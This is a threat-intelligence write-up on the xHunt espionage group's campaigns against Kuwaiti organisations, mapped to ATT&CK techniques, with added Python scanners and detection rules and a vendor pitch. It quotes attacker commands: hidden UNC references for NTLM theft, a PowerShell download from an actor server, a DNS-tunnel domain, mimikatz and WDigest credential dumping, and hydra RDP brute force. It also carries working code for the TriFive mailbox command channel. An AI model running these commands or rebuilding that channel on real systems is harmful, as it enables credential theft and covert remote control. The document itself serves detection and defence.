xHunt APT: Cyber-Espionage Operations Targeting Kuwait and Exchange Servers
xHunt is a highly focused cyber-espionage group known for its persistent, multi-year campaigns targeting organizations in Kuwait. The group has demonstrated a specific interest in the shipping, transportation, and government sectors. First observed in July 2018 [1], xHunt's operations are characterized by the use of a custom, evolving toolkit, with many of its tools named after characters from the anime series "Hunter x Hunter", which is the origin of the group's name [2].
The group has demonstrated a broad capability to infiltrate organizations using diverse attack vectors, ranging from web-facing servers to targeted credential-harvesting operations. One of their most novel tactics involved a watering hole attack on a compromised Kuwaiti government website, where they injected a hidden HTML image tag pointing to an actor-controlled server. This was designed to passively harvest NTLM hashes from visitors by tricking their browsers into an authentication attempt. In other operations, the group has directly compromised Microsoft Exchange and IIS web servers, deploying a suite of custom backdoors. These include the BumbleBee webshell for direct command execution, and PowerShell backdoors like TriFive and Snugy (a CASHY200 variant) for persistent access. The group is notable for its creative command and control (C2) channels, such as those used by the Hisoka and TriFive backdoors, which leverage Exchange Web Services (EWS) to communicate by reading and writing email drafts within a compromised user's mailbox—specifically in the Drafts or Deleted Items folders.
This post reviews xHunt’s major historical operations, details its most significant intrusions against Kuwaiti organizations, and dissects the group’s tactics, techniques, and procedures to show how it runs its cyber-espionage campaigns. Finally, we show how the Picus Platform helps defend against this group.
History & Major Activities of xHunt Group
- May–June 2019 – The group targeted transportation and shipping firms in Kuwait, deploying backdoors named after anime characters, including "Hisoka", "Sakabota", "Netero", and "Killua" [2].
- 2019–2020 – xHunt actors compromised a Microsoft Exchange Server at a Kuwaiti organization and established persistence. In these campaigns they deployed two new PowerShell-based backdoors, "TriFive" and "Snugy" (a variant of CASHY200) [1], as well as a web shell called BumbleBee [3].
ATT&CK Mapping (TTPs) of xHunt Group
Tactic: Initial Access
T1189: Drive-by Compromise
The xHunt actor employed a patient, targeted watering hole attack to harvest credentials. The actor compromised a legitimate website belonging to a Kuwaiti government organization and injected a malicious HTML snippet. This code, which was hidden from visitors using the CSS style attribute visibility:hidden, created a reference to an external SMB share controlled by the actor using the file:// URI scheme [4].
file:///\\microsofte-update[.]com\c$\
When a user running Windows visited the compromised page in a browser that honors file:// references to UNC paths (Internet Explorer and legacy Edge did; current Chromium- and Firefox-based browsers refuse to load file:// resources from an http(s) page), the browser tried to open the remote share and Windows automatically negotiated NTLM authentication with it. That handshake hands the actor's server the user's NTLMv2 challenge-response (commonly called the Net-NTLMv2 hash), which can then be cracked offline or relayed; no user interaction is needed and the visitor sees nothing, because the injected element is hidden.
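The injection described above is easy to spot in page source once you know what to look for: an element whose src or href is a file:// or \\host\share reference, typically hidden with inline CSS. The following Python scanner is an added example, not code from the page or from Unit 42. It parses an HTML document, reports every element that references a file:// or UNC location, names the host it would make the browser authenticate to, and flags whether the element is hidden. The sample page is constructed here and reuses the defanged src value quoted above; the benign image and link are made up.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one benign image and link plus an injected, hidden
# <img> whose src is the defanged file:// UNC reference quoted in the write-up.
SAMPLE_HTML = """
<html><body>
<img src="/images/logo.png" alt="logo">
<p>Ministry news</p>
<img src="file:///\\\\microsofte-update[.]com\\c$\\" style="visibility:hidden">
<a href="https://example.gov.kw/news">More</a>
</body></html>
"""

# Attributes through which a browser may fetch a remote resource.
REF_ATTRS = ("src", "href", "data", "action", "background")
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


def unc_host(value):
    """Return the host named by a file:// or \\\\host\\share reference, else None."""
    v = value.strip()
    if not (v.lower().startswith("file:") or v.startswith("\\\\")):
        return None
    rest = re.sub(r"^file:", "", v, flags=re.I).lstrip("/\\")
    return re.split(r"[\\/]", rest, maxsplit=1)[0] or None


class RefScanner(HTMLParser):
    """Collects every element that references a file:// or UNC location."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        for name in REF_ATTRS:
            host = unc_host(attrs.get(name, ""))
            if host is None:
                continue
            self.findings.append({
                "tag": tag,
                "attr": name,
                "value": attrs[name],
                "host": host,
                # "C:" style hosts are local drive paths, not a remote share
                "local_drive": bool(re.fullmatch(r"[A-Za-z]:", host)),
                "hidden": bool(HIDDEN_CSS.search(attrs.get("style", ""))),
            })

    # Treat self-closing tags (<img ... />) the same way.
    handle_startendtag = handle_starttag


def scan_html(html):
    """Parse the page and return the list of file:// / UNC references found."""
    scanner = RefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        remote = not f["local_drive"]
        verdict = ("hidden remote share reference: likely NTLM harvesting"
                   if f["hidden"] and remote else "file reference, review manually")
        print(f"<{f['tag']} {f['attr']}> -> host {f['host']!r}: {verdict}")
```

Run it over a saved copy of a page (or over proxy-captured responses) and treat any hidden element pointing at a remote host as a credential-harvesting attempt; the same check is worth adding to the integrity monitoring of your own public web properties, since the compromised site here was the victim organisation's own.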
Tactic: Execution
T1047 Windows Management Instrumentation
The Sakabota cheat sheet includes a Windows Management Instrumentation Command-line (WMIC) example demonstrating how to execute a batch script located at c:\temp\a.bat using the process call create method with the given username and password [5].
T1059.001: Command and Scripting Interpreter: PowerShell
The group's primary backdoors, CASHY200, Snugy, and TriFive, are written entirely in PowerShell, leveraging its extensive capabilities for network communication and system interaction. These scripts are typically launched by scheduled tasks whose command lines pass -exec bypass to sidestep the PowerShell execution policy.
The actor also uses PowerShell for ancillary tasks, such as downloading additional tools. The Sakabota cheat sheet contains a one-liner to download Powercat from an actor-controlled server (hxxp://pasta58[.]com/pk.txt) and save it to the victim machine (c:\users\public\pc.ps1) [5].
T1059.003: Command and Scripting Interpreter: Windows Command Shell
CASHY200 tunnels its C2 traffic over DNS. The snippet below, from a CASHY200 sample, assembles the subdomain that carries the tunneled data; the script then invokes cmd.exe to run ping against that name, and the resulting DNS query for a firewallsupports[.]com subdomain is what reaches the actor's server [6].
$domain = $rnd + $in + $id + $coun + $data + '.firewallsupports[.]com'
Tactic: Persistence
T1053.005: Scheduled Task/Job: Scheduled Task
Scheduled tasks are the xHunt actor's preferred method for ensuring the persistence of their PowerShell backdoors. After deploying the TriFive (splwow64.ps1) and Snugy (OfficeIntegrator.ps1) scripts, the actor created scheduled tasks to execute them at regular five-minute and thirty-minute intervals, respectively. The Snugy task, for example, ran the following command [1]:
powershell -exec bypass -file C:\Users\Public\Libraries\OfficeIntegrator.ps1
In another case of installing a Snugy sample, xHunt used the following batch script to create and run a scheduled task named SystemDataProvider [1]:
schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\Windows\SideShow\SystemDataProvider" /tr "powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1" /ru SYSTEM & schtasks /run /tn "\Microsoft\Windows\SideShow\SystemDataProvider"
Tactic: Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
Sakabota’s Passwords tab includes tools for extracting system credentials. The "MIMI" section lets the operator load a provided mimikatz binary and run it with the arguments log privilege::debug sekurlsa::logonpasswords exit [5]. privilege::debug acquires SeDebugPrivilege (so the operator must already hold local administrator rights), and sekurlsa::logonpasswords reads LSASS memory and dumps the authentication material of every active logon session: NTLM hashes, Kerberos keys and, where WDigest caching is enabled, plaintext passwords.
T1110: Brute Force
While many of xHunt's techniques are stealthy, their playbook also includes noisy but potentially effective methods like brute-force attacks. The Sakabota cheat sheet contains a command for using thc-hydra [5], a network login brute-forcing tool, against the Remote Desktop Protocol (RDP). The sample command below tries every password in passwords.txt for the administrator account, one connection at a time (-t 1), printing each attempt (-V) and stopping at the first valid pair (-f):
hydra -t 1 -V -f -l administrator -P passwords.txt rdp://<HOST>
Tactic: Defense Evasion
T1036.005 Masquerading: Match Legitimate Resource Name or Location
Scheduled tasks in an xHunt campaign were named ResolutionsHosts and ResolutionHosts and were placed in the c:\Windows\System32\Tasks\Microsoft\Windows\WDI directory. This was done to mimic the legitimate Windows Diagnostic Infrastructure task named ResolutionHost found in the same location, a clear attempt to evade detection by system administrators and forensic analysts [1].
T1112 Modify Registry
The xHunt actor proactively modifies system security settings to enable their tools to function effectively. The Sakabota cheat sheet includes a command to modify a registry key [5].
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Setting UseLogonCredential to 1 makes the WDigest security package cache a copy of each user's plaintext password in the memory of the lsass.exe process. Microsoft disabled this caching by default from Windows 8.1 and Windows Server 2012 R2 onward (and through KB2871997 on earlier versions) precisely to defeat Mimikatz's sekurlsa::wdigest module; re-enabling it restores plaintext-password harvesting for every user who logs on after the change.
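The cheat-sheet commands covered in the Execution, Persistence, Credential Access and Defense Evasion sections above (WMIC process creation, PowerShell launched from scheduled tasks in user-writable paths, task names under \Microsoft\Windows\, the WDigest registry change, the Mimikatz arguments and the hydra RDP brute force) all contain fixed tokens, so a small command-line detector catches them. The Python below is an added example, not code from the page or from Unit 42. It runs a handful of regex rules over constructed process command lines of the kind you would pull from Sysmon event 1 or Security event 4688; the first six lines reproduce or adapt commands quoted on this page (hosts, the account, the password and the mimikatz file name are made up), the last two are benign controls, and the rule names are mine.

```python
import re

# Constructed process command lines. Lines 0-5 reproduce or adapt commands
# quoted in the write-up (hosts, account, password and the mimikatz file name
# are invented); lines 6-7 are benign controls that must not fire.
SAMPLE_CMDLINES = [
    r'schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\Windows\SideShow\SystemDataProvider" '
    r'/tr "powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1" /ru SYSTEM',
    r'powershell -exec bypass -file C:\Users\Public\Libraries\OfficeIntegrator.ps1',
    r'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f',
    r'C:\Users\Public\mimi.exe log privilege::debug sekurlsa::logonpasswords exit',
    r'hydra -t 1 -V -f -l administrator -P passwords.txt rdp://10.0.0.5',
    r'wmic /node:10.0.0.7 /user:CONTOSO\svc /password:Winter2019 process call create "cmd /c c:\temp\a.bat"',
    r'schtasks /create /sc DAILY /tn "Backup\NightlyJob" /tr "C:\Program Files\Backup\run.exe" /ru SYSTEM',
    r'reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest',
]

# Directories any user can write to, where xHunt dropped its .ps1 files.
USER_WRITABLE = r"(?:C:\\Users\\Public|C:\\Windows\\Temp)\\"

# Each rule: name, ATT&CK ID, and the patterns that must ALL match the command line.
RULES = [
    ("schtasks_powershell_bypass", "T1053.005",
     [r"\bschtasks(?:\.exe)?\b.*?/create\b",
      r'/tr\s+"?powershell\b.*?-(?:exec|ep|executionpolicy)\s+bypass\b']),
    ("task_name_mimics_microsoft", "T1036.005",
     [r"\bschtasks(?:\.exe)?\b.*?/create\b",
      r'/tn\s+"?\\Microsoft\\Windows\\',
      USER_WRITABLE]),
    ("powershell_script_in_public_or_temp", "T1059.001",
     [r"\bpowershell(?:\.exe)?\b.*?" + USER_WRITABLE + r"[^\s\"']+\.ps1\b"]),
    ("wdigest_plaintext_enabled", "T1112",
     [r"\breg(?:\.exe)?\s+add\b.*?\\WDigest\b", r"\bUseLogonCredential\b", r"/d\s+1\b"]),
    ("mimikatz_lsass_dump", "T1003.001",
     [r"sekurlsa::logonpasswords|privilege::debug"]),
    ("wmic_remote_process_create", "T1047",
     [r"\bwmic(?:\.exe)?\b.*?\bprocess\s+call\s+create\b"]),
    ("hydra_rdp_bruteforce", "T1110",
     [r"\bhydra\b", r"\brdp://"]),
]
COMPILED = [(name, ttp, [re.compile(p, re.I) for p in pats]) for name, ttp, pats in RULES]


def detect(cmdline):
    """Return the names of every rule whose patterns all match this command line."""
    return [name for name, _ttp, pats in COMPILED if all(p.search(cmdline) for p in pats)]


def scan_cmdlines(lines):
    """Map line index -> rule names for every line that triggered at least one rule."""
    hits = {}
    for i, line in enumerate(lines):
        names = detect(line)
        if names:
            hits[i] = names
    return hits


if __name__ == "__main__":
    ttp_of = {name: ttp for name, ttp, _ in RULES}
    for i, names in scan_cmdlines(SAMPLE_CMDLINES).items():
        print(f"line {i}: " + ", ".join(f"{n} ({ttp_of[n]})" for n in names))
```

The rules are deliberately conjunctive (a schtasks creation alone is noise; a schtasks creation that names a task under \Microsoft\Windows\ and runs PowerShell out of C:\Windows\Temp is not), which is what keeps the benign backup task and the read-only reg query quiet. The WDigest rule requires /d 1, so a hardening script that writes 0 does not trigger it.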
Tactic: Command and Control
T1071 Application Layer Protocol: Mail Protocols
The TriFive backdoor logs into a legitimate user’s mailbox over EWS using credentials the actor had apparently stolen before installation. TriFive retrieves a PowerShell payload stored as an email draft in the Deleted Items folder and runs whatever code it finds there. Actors issue commands by creating a draft with the subject "555" whose message body is base64-encoded and "encrypted" with a simple character shift; for example, woFyeWt3cw== decodes and decrypts to whoami. The script base64-decodes the message, decrypts it by subtracting 10 from each character, then executes the resulting PowerShell with Invoke-Expression (iex). After execution, TriFive encrypts the command output by adding 10 to each character, base64-encodes the ciphertext, and saves it as a draft with the subject "555 s" in Deleted Items. An example returned body, bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA, decodes and decrypts to contoso\administrator [1]. Because this traffic is ordinary EWS over HTTPS from a legitimate account, it blends into normal Exchange usage and is best hunted in mailbox audit and EWS logs rather than at the network perimeter.
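The draft-based exchange above, as an added example that is not code from the page or from Unit 42: the Python below implements the +10 character shift and base64 wrapping in both directions and round-trips the two samples quoted on this page, then simulates one tasking cycle between operator and implant against an in-memory stand-in for the Deleted Items folder (no EWS call is made). One detail is inferred rather than stated on the page: the command sample only decodes as UTF-8 while the result sample only decodes as UTF-16LE, which matches PowerShell's [Text.Encoding]::Unicode, so the code uses those encodings. The canned whoami output and the removal of consumed drafts are choices of this simulation.

```python
import base64

# Observables reported for TriFive: tasking drafts carry subject "555",
# results come back with subject "555 s", both in the Deleted Items folder.
CMD_SUBJECT = "555"
RESULT_SUBJECT = "555 s"
FOLDER = "Deleted Items"
SHIFT = 10  # the "encryption": every character shifted by +10


def shift(text, delta):
    return "".join(chr(ord(c) + delta) for c in text)


# Operator -> implant: shift +10, then base64 over the UTF-8 bytes.
def encode_command(cmd):
    return base64.b64encode(shift(cmd, SHIFT).encode("utf-8")).decode("ascii")


def decode_command(b64):
    return shift(base64.b64decode(b64).decode("utf-8"), -SHIFT)


# Implant -> operator: shift +10, then base64 over UTF-16LE bytes. The page's
# result sample only decodes this way (PowerShell's [Text.Encoding]::Unicode);
# the encoding is inferred from that sample, not stated in the write-up.
def encode_result(output):
    return base64.b64encode(shift(output, SHIFT).encode("utf-16-le")).decode("ascii")


def decode_result(b64):
    return shift(base64.b64decode(b64).decode("utf-16-le"), -SHIFT)


# A mailbox is modelled as a list of drafts; EWS itself is not touched here.
def operator_task(mailbox, cmd):
    """Operator side: stage a tasking draft in Deleted Items."""
    mailbox.append({"folder": FOLDER, "subject": CMD_SUBJECT, "body": encode_command(cmd)})


def implant_poll(mailbox, run):
    """Implant side: consume each '555' draft, run it, leave a '555 s' draft with the output.
    Removing the consumed draft is this simulation's choice, not a documented TriFive step."""
    executed = []
    for draft in [d for d in mailbox if d["folder"] == FOLDER and d["subject"] == CMD_SUBJECT]:
        mailbox.remove(draft)
        cmd = decode_command(draft["body"])
        mailbox.append({"folder": FOLDER, "subject": RESULT_SUBJECT, "body": encode_result(run(cmd))})
        executed.append(cmd)
    return executed


def operator_collect(mailbox):
    """Operator side: pull and decode every result draft."""
    results = []
    for draft in [d for d in mailbox if d["folder"] == FOLDER and d["subject"] == RESULT_SUBJECT]:
        mailbox.remove(draft)
        results.append(decode_result(draft["body"]))
    return results


def fake_shell(cmd):
    """Stand-in for Invoke-Expression: canned output for the demo (constructed)."""
    return {"whoami": "contoso\\administrator"}.get(cmd, f"'{cmd}' is not recognized")


if __name__ == "__main__":
    # Round-trip the two samples quoted in the write-up.
    assert decode_command("woFyeWt3cw==") == "whoami"
    assert decode_result("bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA") == "contoso\\administrator"
    mailbox = []
    operator_task(mailbox, "whoami")
    print("tasking draft body:", mailbox[0]["body"])
    implant_poll(mailbox, fake_shell)
    print("result draft body:", mailbox[0]["body"])
    print("operator sees:", operator_collect(mailbox))
```

For hunting, the fixed subjects "555" and "555 s", a body that is pure base64, and the Deleted Items folder are the observables; decode_result is what you would run on a suspicious "555 s" draft recovered from a mailbox to learn what the actor already collected.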
T1572 Protocol Tunneling
The actor established SSH tunnels to interact with BumbleBee webshells on internal IIS web servers across three Kuwaiti organizations, none of which were directly internet-accessible. Commands executed through the BumbleBee webshells indicate use of PuTTY Link (Plink) to create tunnels into internal services. One tunnel targeted TCP port 3389, indicating Remote Desktop Protocol access, while others targeted TCP port 80 to reach internal IIS servers. The activity suggests the actor leveraged internal web applications’ file upload functionality on those IIS servers to deploy BumbleBee, facilitating lateral movement within the compromised networks [3].
T1665 Hide Infrastructure
The actor directly accessed a BumbleBee webshell on a compromised, internet-exposed Exchange server belonging to a Kuwaiti organization. Access was routed through Private Internet Access VPN infrastructure, with frequent switching between VPN servers to alter the apparent source IP in server logs. The activity was made to appear as originating from multiple countries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden, and the United Kingdom. This pattern indicates deliberate efforts to obfuscate origin and complicate traceability [3].
How Does Picus Simulate xHunt Attacks?
We strongly suggest simulating xHunt attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for xHunt:
Threat ID | Threat Name | Attack Module
47076 | xHunt Threat Group Campaign Malware Download Threat | Network Infiltration
98975 | xHunt Threat Group Campaign Malware Email Threat | Network Infiltration
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
Aliases of xHunt Group
xHunt is also known as: SectorD01, Hive0081, Cobalt Katana, Hunter Serpens.
References
[1] R. Falcone, "xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/
[2] R. Falcone and B. Barbehenn, "xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/
[3] R. Falcone, "xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/
[4] B. Barbehenn and R. Falcone, "xHunt Campaign: New Watering Hole Identified for Credential Harvesting," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-campaign-new-watering-hole-identified-for-credential-harvesting/
[5] R. Falcone, "xHunt Campaign: xHunt Actor’s Cheat Sheet," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/
[6] R. Falcone and B. Barbehenn, "xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/